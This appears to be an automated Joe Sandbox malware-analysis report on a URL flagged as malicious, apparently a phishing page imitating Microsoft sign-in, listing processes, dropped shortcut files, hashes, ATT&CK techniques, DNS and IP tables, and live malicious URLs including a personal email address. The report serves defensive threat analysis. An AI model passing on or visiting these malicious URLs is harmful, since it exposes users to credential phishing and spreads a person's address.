Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://lap.gnoqwwhpwe.ru/favicon.ico100%Avira URL Cloudmalware
https://lap.gnoqwwhpwe.ru/3aeK/100%Avira URL Cloudmalware
https://ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru/88179202633210629qXfkzyHvrVBUQZUAWKGZUAFRQZZZMLJBLFELJHJ0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    sni1gl.wpc.alphacdn.net
    152.199.21.175
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru
        172.67.155.45
        truefalse
          high
          code.jquery.com
          151.101.130.137
          truefalse
            high
            inbound-weighted.protechts.net
            35.190.10.96
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                high
                s-part-0036.t-0009.t-msedge.net
                13.107.246.64
                truefalse
                  high
                  challenges.cloudflare.com
                  104.18.95.41
                  truefalse
                    high
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      lap.gnoqwwhpwe.ru
                      188.114.96.3
                      truetrue
                        unknown
                        www.google.com
                        216.58.206.68
                        truefalse
                          high
                          stk.hsprotect.net
                          34.107.199.61
                          truefalse
                            high
                            www.office.com
                            unknown
                            unknownfalse
                              high
                              signup.live.com
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  collector-pxzc5j78di.hsprotect.net
                                  unknown
                                  unknownfalse
                                    high
                                    logincdn.msftauth.net
                                    unknown
                                    unknownfalse
                                      high
                                      client.hsprotect.net
                                      unknown
                                      unknownfalse
                                        high
                                        identity.nel.measure.office.net
                                        unknown
                                        unknownfalse
                                          high
                                          msft.hsprotect.net
                                          unknown
                                          unknownfalse
                                            high
                                            login.microsoftonline.com
                                            unknown
                                            unknownfalse
                                              high
                                              fpt.live.com
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJfalse
                                                    high
                                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/false
                                                        high
                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ff194a8eb4842ec/1736395861048/f9f80bbbf521086628021de98408b367f83ff438cb61ab1bcf16bf67eb9bd1d0/rQfzELCojb_dIXkfalse
                                                            high
                                                            https://lap.gnoqwwhpwe.ru/3aeK/true
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ff194a8eb4842ec/1736395861052/t2RBxqreWkaI5Yqfalse
                                                              high
                                                              https://collector-pxzc5j78di.hsprotect.net/api/v2/msftfalse
                                                                high
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                                  high
                                                                  https://stk.hsprotect.net/ns?c=dfd0a870-ce3f-11ef-ae3b-e12a94f7ceb6false
                                                                    high
                                                                    https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                                      high
                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff194a8eb4842ec&lang=autofalse
                                                                        high
                                                                        https://lap.gnoqwwhpwe.ru/favicon.icofalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru/88179202633210629qXfkzyHvrVBUQZUAWKGZUAFRQZZZMLJBLFELJHJfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://a.nel.cloudflare.com/report/v4?s=Oqxao9qQCC6II3KSlsZF6aku7OXU7mAi7dckWx91GM1OzUBm%2BxhhaPQi1WEK5sfBwduW0IdgDScmXau4zMP3rcOKzsn0L4GT9p6MF7DOc7FbimndZWzzcruaKpB%2B6A%3D%3Dfalse
                                                                          high
                                                                          https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comtrue
                                                                            unknown
                                                                            https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719926711113592.MGMwZTlkYTAtNjAwOS00MGE2LWI1M2MtMWExYzU4MTEyMTNjZGVmYjRkYmUtM2E2ZC00ODQ4LWIxYjAtNmM0ZTI2ODU2YjY0&ui_locales=en-US&mkt=en-US&client-request-id=4b4b65bb-b1a5-4571-8e7d-4510916c1a9e&state=-rrfQmItooASPaRkkKC0PR8lvbZtx-NhWg_Ulitzr4ibSCiHp8gF5UKmX1o3haf1k5o8l3c3PjQ7nBp1J_adxQ_pnCkluBlhfVcqWxjmJ91kcd9CY4QCahFxRgXcFvy-GukBMlZryuF_0mWeZVP9keorrEjMPAcfGKqxXLy9so2M2B9z5w_a5oYCxMLkgJ4WPgXJylklcvOfVkwhCEkvFrDP0Xf--0WzOxT9CkVZnEHveP-ZMz44QdF93bQRQq_khLbO7bYAConenUcFqV25ow&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                                              high
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://login.microsoftonline.comchromecache_100.1.dr, chromecache_111.1.drfalse
                                                                                high
                                                                                https://client.hsprotect.net/PXzC5j78di/main.min.jschromecache_151.1.drfalse
                                                                                  high
                                                                                  https://login.windows-ppe.netchromecache_100.1.dr, chromecache_111.1.drfalse
                                                                                    high
                                                                                    https://fpt.live.com/chromecache_141.1.drfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      172.67.155.45
                                                                                      ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ruUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      35.190.10.96
                                                                                      inbound-weighted.protechts.netUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      151.101.130.137
                                                                                      code.jquery.comUnited States
                                                                                      54113FASTLYUSfalse
                                                                                      104.21.6.222
                                                                                      unknownUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      35.190.80.1
                                                                                      a.nel.cloudflare.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      34.107.199.61
                                                                                      stk.hsprotect.netUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      104.17.24.14
                                                                                      cdnjs.cloudflare.comUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      142.250.186.36
                                                                                      unknownUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      104.18.95.41
                                                                                      challenges.cloudflare.comUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      216.58.206.68
                                                                                      www.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      151.101.2.137
                                                                                      unknownUnited States
                                                                                      54113FASTLYUSfalse
                                                                                      239.255.255.250
                                                                                      unknownReserved
                                                                                      unknownunknownfalse
                                                                                      188.114.96.3
                                                                                      lap.gnoqwwhpwe.ruEuropean Union
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      IP
                                                                                      192.168.2.16
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1586435
                                                                                      Start date and time:2025-01-09 05:10:24 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 3m 45s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                      Sample URL:https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:13
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal60.win@24/116@60/14
                                                                                      EGA Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 0
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.184.206, 66.102.1.84, 142.250.186.174, 142.250.186.78, 20.190.159.0, 20.190.159.4, 20.190.159.68, 20.190.159.73, 40.126.31.67, 20.190.159.23, 40.126.31.71, 40.126.31.73, 13.107.6.156, 142.250.185.206, 40.126.32.136, 20.190.160.14, 40.126.32.72, 20.190.160.20, 40.126.32.134, 40.126.32.74, 40.126.32.140, 20.190.160.17, 172.217.16.206, 20.190.159.2, 40.126.31.69, 20.190.159.71, 216.58.206.74, 142.250.185.74, 172.217.18.106, 142.250.185.138, 142.250.186.42, 216.58.206.42, 142.250.186.138, 142.250.185.202, 142.250.185.234, 142.250.186.170, 142.250.186.106, 142.250.181.234, 216.58.212.138, 142.250.184.202, 142.250.186.74, 172.217.16.138, 20.50.80.213, 51.116.253.170, 216.58.206.78, 142.250.186.46, 40.126.32.138, 40.126.32.133, 40.126.32.68, 40.126.32.76, 13.107.42.22, 52.167.30.171, 2.23.227.211, 2.23.227.224, 142.250.185.106, 172.217.16.202, 172.217.18.10, 142.250.184.234, 142.250.185.170, 142.250.74.202, 95.101.54.121, 95.101.54.113, 20.42.73.24,
                                                                                      • Excluded domains from analysis (whitelisted): greenid-prod-pme.eastus2.cloudapp.azure.com, lgincdnmsftuswe2.azureedge.net, pme-greenid-prod.trafficmanager.net, slscr.update.microsoft.com, onedscolprdeus03.eastus.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, ak.privatelink.msidentity.com, clients2.google.com, login.live.com, update.googleapis.com, onedscolprdgwc07.germanywestcentral.cloudapp.azure.com, fpt2.microsoft.com, fs.microsoft.com, acctcdnmsftuswe2.azureedge.net, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, onedscolprdneu08.northeurope.cloudapp.azure.com, lgincdnvzeuno.ec.azureedge.net, aadcdn.msauth.net, eu.events.data.trafficmanager.net, edgedl.me.gvt1.com, e177902.dscd.akamaiedge.net, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, account.msa.msidentity.com, clients.l.google.com, fpt.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.microsoft.com,
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com
                                                                                      No simulations
                                                                                      No context
                                                                                      No context
                                                                                      No context
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 03:10:56 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2673
                                                                                      Entropy (8bit):3.991966427719591
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8td2TyuOHqidAKZdA1FehwiZUklqehGfy+3:8WnPhfy
                                                                                      MD5:9759231200815C1B7F3E81F00EBA4BE8
                                                                                      SHA1:EC51D39126EFD6C55BB4F0B2A6250BAB3EA5FBDE
                                                                                      SHA-256:1E1DBD1849D98BAD9E8BD2D7DA1225E8CEAB9270D9C103743E053E33ED0F073A
                                                                                      SHA-512:88CDE1C84D038C884A36DB4C2015DB43023EA4375AE523BF2CB8715B09C2A00E679EFAF30E871B592C127CECF92B47D1D152258D27278CE70FB33A2DDAEB6E05
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.@.. ...$+.,......6{Lb..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I)ZR!....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z[!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z[!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z[!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z]!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Q.6^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 03:10:56 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2675
                                                                                      Entropy (8bit):4.00728279441558
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8Xd2TyuOHqidAKZdA1seh/iZUkAQkqehRfy+2:8Yn59QEfy
                                                                                      MD5:4E1BF391156F05B10BDAEC984143CC70
                                                                                      SHA1:C87B674F7FE2D335E1877E37BE74AF77AD3D1919
                                                                                      SHA-256:4F80A32DB6288F7DFD8CD0602764CAE56498E1442B3AF32BA8660B38908AA1C7
                                                                                      SHA-512:3A518A54BAEBED6DBA184365B1A72B426A63754BB082AC8C70CEDF9F5E9F45FC19531F9B9B3EC4D4DE367E32DB3D69583B8A7A3B1E4A7666E755E642E1E6BFF4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.@.. ...$+.,....3",{Lb..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I)ZR!....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z[!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z[!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z[!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z]!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Q.6^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2689
                                                                                      Entropy (8bit):4.015489281809681
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8md2TyuAHqidAKZdA14meh7sFiZUkmgqeh7sHfy+BX:8vnTnVfy
                                                                                      MD5:F85157A8E420E6108D4DABF60901257C
                                                                                      SHA1:5A981D44728B10E1A3D64E3D7DACC1AB63E918BD
                                                                                      SHA-256:4861526D2849309DE7F254ACC4315B01DE198B4C01DD3539F919D9212A8159D9
                                                                                      SHA-512:354CA38EAF7C1D2846A3F87A1174F2A54CCDAB7EEA198126C376D8EFC2007BCF75627FA23B1F1A5DA0D8255F38690CEB3AE8D4D5B21DC8CA1AD3B2D4089AD33E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I)ZR!....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z[!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z[!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z[!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Q.6^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 03:10:56 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2677
                                                                                      Entropy (8bit):4.005370130430497
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8vd2TyuOHqidAKZdA1TehDiZUkwqehdfy+R:8wnqPfy
                                                                                      MD5:0BD073A1C1388A09A638EB3865061021
                                                                                      SHA1:40379B3BE80043DC2DCEA17B063553B7CEA64F5B
                                                                                      SHA-256:089B06EB4EF54FC2E13DF933A072CD156369F72699114C9373882E456C70CF6E
                                                                                      SHA-512:251FCA3D2054D5BA445316069F693C0C9F67E3F8F5A19888685B9A58FBE08CB8E678DA6691C8A6C78DE7CB7B9A39E6DB5132FF780CBB7B8A81653B844CD8EB39
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.@.. ...$+.,....|D%{Lb..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I)ZR!....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z[!....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z[!....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z[!..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z]!...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Q.6^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 03:10:56 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2677
                                                                                      Entropy (8bit):3.9942476761442722
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8Ld2TyuOHqidAKZdA1dehBiZUk1W1qeh7fy+C:8snq9bfy
                                                                                      MD5:A9736F659738B3030E8E5010F81B5EC9
                                                                                      SHA1:E5771944171E0A3A5E9D34FAC31F71430C9692EC
                                                                                      SHA-256:6F94F4C69E630766084B16F6610B588FDC67FA3437E0572ADA4F6DB4EB8E7000
                                                                                      SHA-512:6340C78F53A78FA63B0430E2741FD2158AF6C6526D48C0C5DAA5B629F9382DD2D106B2D5D36B74ADAC0B340CD334B34FB1773C73D22C513D3494E6F48F737A76
                                                                                      Malicious:false
                                                                                      Reputation:low
